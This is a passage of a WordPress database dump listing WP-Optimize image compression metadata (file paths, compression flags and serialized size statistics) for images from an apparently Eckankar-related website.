WP-Optimize'),(164301,165275,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:103978;s:12:\"smushed-size\";i:69342;s:15:\"savings-percent\";d:33.31000000000000227373675443232059478759765625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:103978;s:10:\"compressed\";i:69342;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13587;s:10:\"compressed\";i:12177;}s:6:\"medium\";a:2:{s:8:\"original\";i:32552;s:10:\"compressed\";i:29372;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:46706;s:10:\"compressed\";i:42586;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2487;s:10:\"compressed\";i:2022;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:39287;s:10:\"compressed\";i:35724;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:24463;s:10:\"compressed\";i:22070;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:79967;s:10:\"compressed\";i:73322;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22787;s:10:\"compressed\";i:20484;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:49492;s:10:\"compressed\";i:45131;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18100;s:10:\"compressed\";i:16264;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:47376;s:10:\"compressed\";i:43108;}}}'),(164302,165276,'original-file','2019/09/ECK_Temple_CO_059-lg-updraft-pre-smush-original.jpg'),(164303,165276,'smush-complete','1'),(164304,165276,'smush-info','The file was compressed from 88.11 KB to 72.16 KB saving 18.11 percent using WP-Optimize'),(164305,165276,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:90228;s:12:\"smushed-size\";i:73891;s:15:\"savings-percent\";d:18.1099999999999994315658113919198513031005859375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:90228;s:10:\"compressed\";i:73891;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13286;s:10:\"compressed\";i:12034;}s:6:\"medium\";a:2:{s:8:\"original\";i:33329;s:10:\"compressed\";i:30292;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:49150;s:10:\"compressed\";i:44840;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2239;s:10:\"compressed\";i:1800;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:41488;s:10:\"compressed\";i:37733;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:24975;s:10:\"compressed\";i:22649;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:86937;s:10:\"compressed\";i:79593;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22921;s:10:\"compressed\";i:20810;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:52500;s:10:\"compressed\";i:47831;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17877;s:10:\"compressed\";i:16248;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:50221;s:10:\"compressed\";i:45758;}}}'),(164306,165277,'original-file','2019/09/ECK_Temple_CO_060-lg-updraft-pre-smush-original.jpg'),(164307,165277,'smush-complete','1'),(164308,165277,'smush-info','The file was compressed from 98.51 KB to 48.67 KB saving 50.6 percent using WP-Optimize'),(164309,165277,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:100875;s:12:\"smushed-size\";i:49833;s:15:\"savings-percent\";d:50.60000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:100875;s:10:\"compressed\";i:49833;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10799;s:10:\"compressed\";i:9861;}s:6:\"medium\";a:2:{s:8:\"original\";i:23885;s:10:\"compressed\";i:22094;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:34407;s:10:\"compressed\";i:32149;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2255;s:10:\"compressed\";i:1820;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:29756;s:10:\"compressed\";i:27654;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18148;s:10:\"compressed\";i:16716;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:57673;s:10:\"compressed\";i:54388;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:16845;s:10:\"compressed\";i:15540;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:35912;s:10:\"compressed\";i:33589;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13511;s:10:\"compressed\";i:12380;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:34553;s:10:\"compressed\";i:32250;}}}'),(164310,165278,'original-file','2019/09/ECK_Temple_CO_061-lg-updraft-pre-smush-original.jpg'),(164311,165278,'smush-complete','1'),(164312,165278,'smush-info','The file was compressed from 76.15 KB to 61.43 KB saving 19.33 percent using WP-Optimize'),(164313,165278,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:77980;s:12:\"smushed-size\";i:62904;s:15:\"savings-percent\";d:19.3299999999999982946974341757595539093017578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:77980;s:10:\"compressed\";i:62904;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12454;s:10:\"compressed\";i:11278;}s:6:\"medium\";a:2:{s:8:\"original\";i:29561;s:10:\"compressed\";i:26953;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:42119;s:10:\"compressed\";i:38644;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2265;s:10:\"compressed\";i:1827;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:35904;s:10:\"compressed\";i:32848;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22418;s:10:\"compressed\";i:20404;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:73095;s:10:\"compressed\";i:67465;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20777;s:10:\"compressed\";i:18897;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:45455;s:10:\"compressed\";i:41662;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16344;s:10:\"compressed\";i:14824;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:43076;s:10:\"compressed\";i:39507;}}}'),(164314,165279,'original-file','2019/09/ECK_Temple_CO_062-lg-updraft-pre-smush-original.jpg'),(164315,165279,'smush-complete','1'),(164316,165279,'smush-info','The file was compressed from 95.84 KB to 69.36 KB saving 27.62 percent using WP-Optimize'),(164317,165279,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:98137;s:12:\"smushed-size\";i:71027;s:15:\"savings-percent\";d:27.620000000000000994759830064140260219573974609375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:98137;s:10:\"compressed\";i:71027;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12483;s:10:\"compressed\";i:11237;}s:6:\"medium\";a:2:{s:8:\"original\";i:27444;s:10:\"compressed\";i:24830;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:43877;s:10:\"compressed\";i:40171;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2432;s:10:\"compressed\";i:1981;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:34768;s:10:\"compressed\";i:31808;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21019;s:10:\"compressed\";i:18999;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:68610;s:10:\"compressed\";i:63202;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:23783;s:10:\"compressed\";i:21409;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:51426;s:10:\"compressed\";i:47010;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16979;s:10:\"compressed\";i:15311;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:43581;s:10:\"compressed\";i:39828;}}}'),(164318,165280,'original-file','2019/09/ECK_Temple_CO_063-lg-updraft-pre-smush-original.jpg'),(164319,165280,'smush-complete','1'),(164320,165280,'smush-info','The file was compressed from 104.57 KB to 54.03 KB saving 48.33 percent using WP-Optimize'),(164321,165280,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:107079;s:12:\"smushed-size\";i:55331;s:15:\"savings-percent\";d:48.3299999999999982946974341757595539093017578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:107079;s:10:\"compressed\";i:55331;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10789;s:10:\"compressed\";i:9766;}s:6:\"medium\";a:2:{s:8:\"original\";i:25976;s:10:\"compressed\";i:23910;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:39592;s:10:\"compressed\";i:36673;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2221;s:10:\"compressed\";i:1759;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:30182;s:10:\"compressed\";i:27900;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:19770;s:10:\"compressed\";i:18099;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:64856;s:10:\"compressed\";i:60619;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:18309;s:10:\"compressed\";i:16733;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:39678;s:10:\"compressed\";i:36886;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14714;s:10:\"compressed\";i:13387;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:38534;s:10:\"compressed\";i:35678;}}}'),(164322,165281,'original-file','2019/09/ECK_Temple_CO_064-lg-updraft-pre-smush-original.jpg'),(164323,165281,'smush-complete','1'),(164324,165281,'smush-info','The file was compressed from 88.44 KB to 78.87 KB saving 10.82 percent using WP-Optimize'),(164325,165281,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:90562;s:12:\"smushed-size\";i:80762;s:15:\"savings-percent\";d:10.82000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:90562;s:10:\"compressed\";i:80762;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10529;s:10:\"compressed\";i:9754;}s:6:\"medium\";a:2:{s:8:\"original\";i:27507;s:10:\"compressed\";i:25568;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:28110;s:10:\"compressed\";i:26457;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2146;s:10:\"compressed\";i:1708;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:31225;s:10:\"compressed\";i:29216;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:32444;s:10:\"compressed\";i:30214;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:12149;s:10:\"compressed\";i:11192;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12310;s:10:\"compressed\";i:11499;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:32491;s:10:\"compressed\";i:30460;}}}'),(164326,165282,'original-file','2019/09/ECK_Temple_CO_065-lg-updraft-pre-smush-original.jpg'),(164327,165282,'smush-complete','1'),(164328,165282,'smush-info','The file was compressed from 47.78 KB to 43.03 KB saving 9.95 percent using WP-Optimize'),(164329,165282,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:48927;s:12:\"smushed-size\";i:44060;s:15:\"savings-percent\";d:9.949999999999999289457264239899814128875732421875;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:48927;s:10:\"compressed\";i:44060;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13249;s:10:\"compressed\";i:11924;}s:6:\"medium\";a:2:{s:8:\"original\";i:32375;s:10:\"compressed\";i:29195;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:37347;s:10:\"compressed\";i:34048;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2491;s:10:\"compressed\";i:2029;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:37420;s:10:\"compressed\";i:33840;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:38091;s:10:\"compressed\";i:34383;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14963;s:10:\"compressed\";i:13377;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16461;s:10:\"compressed\";i:14858;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:40709;s:10:\"compressed\";i:37117;}}}'),(164330,165283,'original-file','2019/09/ECK_Temple_CO_066-lg-updraft-pre-smush-original.jpg'),(164331,165283,'smush-complete','1'),(164332,165283,'smush-info','The file was compressed from 128.01 KB to 73.13 KB saving 42.87 percent using WP-Optimize'),(164333,165283,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:131081;s:12:\"smushed-size\";i:74884;s:15:\"savings-percent\";d:42.86999999999999744204615126363933086395263671875;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:131081;s:10:\"compressed\";i:74884;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14221;s:10:\"compressed\";i:12529;}s:6:\"medium\";a:2:{s:8:\"original\";i:33897;s:10:\"compressed\";i:30313;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:48988;s:10:\"compressed\";i:44311;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2601;s:10:\"compressed\";i:2120;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:40516;s:10:\"compressed\";i:36437;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25699;s:10:\"compressed\";i:22861;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:86136;s:10:\"compressed\";i:78776;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:23891;s:10:\"compressed\";i:21283;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:52374;s:10:\"compressed\";i:47289;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18897;s:10:\"compressed\";i:16792;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:49890;s:10:\"compressed\";i:44949;}}}'),(164334,165284,'original-file','2019/09/ECK_Temple_CO_067-lg-updraft-pre-smush-original.jpg'),(164335,165284,'smush-complete','1'),(164336,165284,'smush-info','The file was compressed from 72.74 KB to 59.46 KB saving 18.26 percent using WP-Optimize'),(164337,165284,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:74484;s:12:\"smushed-size\";i:60885;s:15:\"savings-percent\";d:18.260000000000001563194018672220408916473388671875;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:74484;s:10:\"compressed\";i:60885;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11369;s:10:\"compressed\";i:10351;}s:6:\"medium\";a:2:{s:8:\"original\";i:28624;s:10:\"compressed\";i:26171;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:43388;s:10:\"compressed\";i:39761;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2190;s:10:\"compressed\";i:1751;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:32827;s:10:\"compressed\";i:30310;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21421;s:10:\"compressed\";i:19548;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:71756;s:10:\"compressed\";i:66613;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20045;s:10:\"compressed\";i:18244;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:44198;s:10:\"compressed\";i:40751;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15805;s:10:\"compressed\";i:14403;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:42471;s:10:\"compressed\";i:39127;}}}'),(164338,165285,'original-file','2019/09/ECK_Temple_CO_068-lg-updraft-pre-smush-original.jpg'),(164339,165285,'smush-complete','1'),(164340,165285,'smush-info','The file was compressed from 82.44 KB to 65.95 KB saving 20 percent using WP-Optimize'),(164341,165285,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:84416;s:12:\"smushed-size\";i:67530;s:15:\"savings-percent\";d:20;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:84416;s:10:\"compressed\";i:67530;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12521;s:10:\"compressed\";i:11486;}s:6:\"medium\";a:2:{s:8:\"original\";i:32261;s:10:\"compressed\";i:29652;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:47235;s:10:\"compressed\";i:43122;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2295;s:10:\"compressed\";i:1863;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:38272;s:10:\"compressed\";i:35296;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:24114;s:10:\"compressed\";i:22143;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:84477;s:10:\"compressed\";i:77909;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:21120;s:10:\"compressed\";i:19417;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:48983;s:10:\"compressed\";i:45052;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16865;s:10:\"compressed\";i:15475;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:47154;s:10:\"compressed\";i:43365;}}}'),(164342,165286,'original-file','2019/09/ECK_Temple_CO_069-lg-updraft-pre-smush-original.jpg'),(164343,165286,'smush-complete','1'),(164344,165286,'smush-info','The file was compressed from 125.81 KB to 71.84 KB saving 42.9 percent using WP-Optimize'),(164345,165286,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:128828;s:12:\"smushed-size\";i:73567;s:15:\"savings-percent\";d:42.89999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:128828;s:10:\"compressed\";i:73567;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14033;s:10:\"compressed\";i:12573;}s:6:\"medium\";a:2:{s:8:\"original\";i:32862;s:10:\"compressed\";i:29774;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:51013;s:10:\"compressed\";i:46202;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2483;s:10:\"compressed\";i:2008;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:41380;s:10:\"compressed\";i:37483;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:24251;s:10:\"compressed\";i:21958;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:83459;s:10:\"compressed\";i:76722;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22541;s:10:\"compressed\";i:20352;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:51095;s:10:\"compressed\";i:46595;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18011;s:10:\"compressed\";i:16227;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:49533;s:10:\"compressed\";i:45039;}}}'),(164346,165287,'original-file','2019/09/ECK_Temple_CO_070-lg-updraft-pre-smush-original.jpg'),(164347,165287,'smush-complete','1'),(164348,165287,'smush-info','The file was compressed from 117.20 KB to 64.83 KB saving 44.69 percent using WP-Optimize'),(164349,165287,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:120015;s:12:\"smushed-size\";i:66385;s:15:\"savings-percent\";d:44.68999999999999772626324556767940521240234375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:120015;s:10:\"compressed\";i:66385;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12576;s:10:\"compressed\";i:11329;}s:6:\"medium\";a:2:{s:8:\"original\";i:29848;s:10:\"compressed\";i:27126;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:44512;s:10:\"compressed\";i:40663;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2351;s:10:\"compressed\";i:1900;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:36253;s:10:\"compressed\";i:33170;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22314;s:10:\"compressed\";i:20291;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:74069;s:10:\"compressed\";i:68408;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20814;s:10:\"compressed\";i:18880;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:45572;s:10:\"compressed\";i:41874;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16545;s:10:\"compressed\";i:14968;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:43886;s:10:\"compressed\";i:40273;}}}'),(164350,173870,'original-file','2019/10/activities-ELSS-updraft-pre-smush-original.jpg'),(164351,173870,'smush-complete','1'),(164352,173870,'smush-info','The file was compressed from 64.39 KB to 22.48 KB saving 65.08 percent using WP-Optimize'),(164353,173870,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:65934;s:12:\"smushed-size\";i:23023;s:15:\"savings-percent\";d:65.0799999999999982946974341757595539093017578125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:65934;s:10:\"compressed\";i:23023;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10822;s:10:\"compressed\";i:9803;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2268;s:10:\"compressed\";i:1831;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14783;s:10:\"compressed\";i:13430;}}}'),(164354,173871,'original-file','2019/10/activities-Seminars-Workshops-updraft-pre-smush-original.jpg'),(164355,173871,'smush-complete','1'),(164356,173871,'smush-info','The file was compressed from 16.62 KB to 15.24 KB saving 8.3 percent using WP-Optimize'),(164357,173871,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:17019;s:12:\"smushed-size\";i:15607;s:15:\"savings-percent\";d:8.300000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:17019;s:10:\"compressed\";i:15607;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13586;s:10:\"compressed\";i:11836;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2692;s:10:\"compressed\";i:2204;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18621;s:10:\"compressed\";i:16287;}}}'),(164358,173872,'original-file','2019/10/activities-Easy-Way-updraft-pre-smush-original.jpg'),(164359,173872,'smush-complete','1'),(164360,173872,'smush-info','The file was compressed from 11.53 KB to 11.09 KB saving 3.8 percent using WP-Optimize'),(164361,173872,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11808;s:12:\"smushed-size\";i:11359;s:15:\"savings-percent\";d:3.79999999999999982236431605997495353221893310546875;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:11808;s:10:\"compressed\";i:11359;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9457;s:10:\"compressed\";i:8877;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2008;s:10:\"compressed\";i:1610;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13174;s:10:\"compressed\";i:12059;}}}'),(164362,173873,'original-file','2019/10/activities-Meetups-updraft-pre-smush-original.jpg'),(164363,173873,'smush-complete','1'),(164364,173873,'smush-info','The file was compressed from 15.16 KB to 14.33 KB saving 5.49 percent using WP-Optimize'),(164365,173873,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:15522;s:12:\"smushed-size\";i:14670;s:15:\"savings-percent\";d:5.4900000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:15522;s:10:\"compressed\";i:14670;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13358;s:10:\"compressed\";i:11756;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2611;s:10:\"compressed\";i:2129;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17739;s:10:\"compressed\";i:15704;}}}'),(164366,173875,'original-file','2019/10/activities-Youth-and-Family-updraft-pre-smush-original.jpg'),(164367,173875,'smush-complete','1'),(164368,173875,'smush-info','The file was compressed from 11.44 KB to 10.82 KB saving 5.41 percent using WP-Optimize'),(164369,173875,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11718;s:12:\"smushed-size\";i:11084;s:15:\"savings-percent\";d:5.410000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:11718;s:10:\"compressed\";i:11084;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10118;s:10:\"compressed\";i:9364;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2219;s:10:\"compressed\";i:1784;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12877;s:10:\"compressed\";i:11811;}}}'),(164370,173876,'original-file','2019/10/activities-Video-Discussions-updraft-pre-smush-original.jpg'),(164371,173876,'smush-complete','1'),(164372,173876,'smush-info','The file was compressed from 11.17 KB to 10.51 KB saving 5.9 percent using WP-Optimize'),(164373,173876,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:11440;s:12:\"smushed-size\";i:10765;s:15:\"savings-percent\";d:5.9000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:11440;s:10:\"compressed\";i:10765;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9506;s:10:\"compressed\";i:8694;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2346;s:10:\"compressed\";i:1863;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12626;s:10:\"compressed\";i:11476;}}}'),(164374,173877,'original-file','2019/10/activities-book-discussions-2-updraft-pre-smush-original.jpg'),(164375,173877,'smush-complete','1'),(164376,173877,'smush-info','The file was compressed from 12.28 KB to 11.77 KB saving 4.13 percent using WP-Optimize'),(164377,173877,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12570;s:12:\"smushed-size\";i:12051;s:15:\"savings-percent\";d:4.12999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:12570;s:10:\"compressed\";i:12051;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9352;s:10:\"compressed\";i:8689;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1915;s:10:\"compressed\";i:1514;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14287;s:10:\"compressed\";i:12983;}}}'),(164378,173926,'original-file','2019/10/activities-ELSS-2-updraft-pre-smush-original.jpg'),(164379,173926,'smush-complete','1'),(164380,173926,'smush-info','The file was compressed from 65.77 KB to 24.24 KB saving 63.14 percent using WP-Optimize'),(164381,173926,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:67344;s:12:\"smushed-size\";i:24825;s:15:\"savings-percent\";d:63.1400000000000005684341886080801486968994140625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:67344;s:10:\"compressed\";i:24825;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11602;s:10:\"compressed\";i:10447;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2390;s:10:\"compressed\";i:1957;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15773;s:10:\"compressed\";i:14246;}}}'),(164382,175618,'original-file','2019/10/harold-klemp-smtabs-updraft-pre-smush-original.jpg'),(164383,175618,'smush-complete','1'),(164384,175618,'smush-info','The file was compressed from 7.19 KB to 6.76 KB saving 6.02 percent using WP-Optimize'),(164385,175618,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:7361;s:12:\"smushed-size\";i:6918;s:15:\"savings-percent\";d:6.019999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:3:{s:4:\"full\";a:2:{s:8:\"original\";i:7361;s:10:\"compressed\";i:6918;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9200;s:10:\"compressed\";i:8551;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2096;s:10:\"compressed\";i:1693;}}}'),(164386,181893,'original-file','2019/10/eck-privacy-1-updraft-pre-smush-original.jpg'),(164387,181893,'smush-complete','1'),(164388,181893,'smush-info','The file was compressed from 28.52 KB to 26.26 KB saving 7.94 percent using 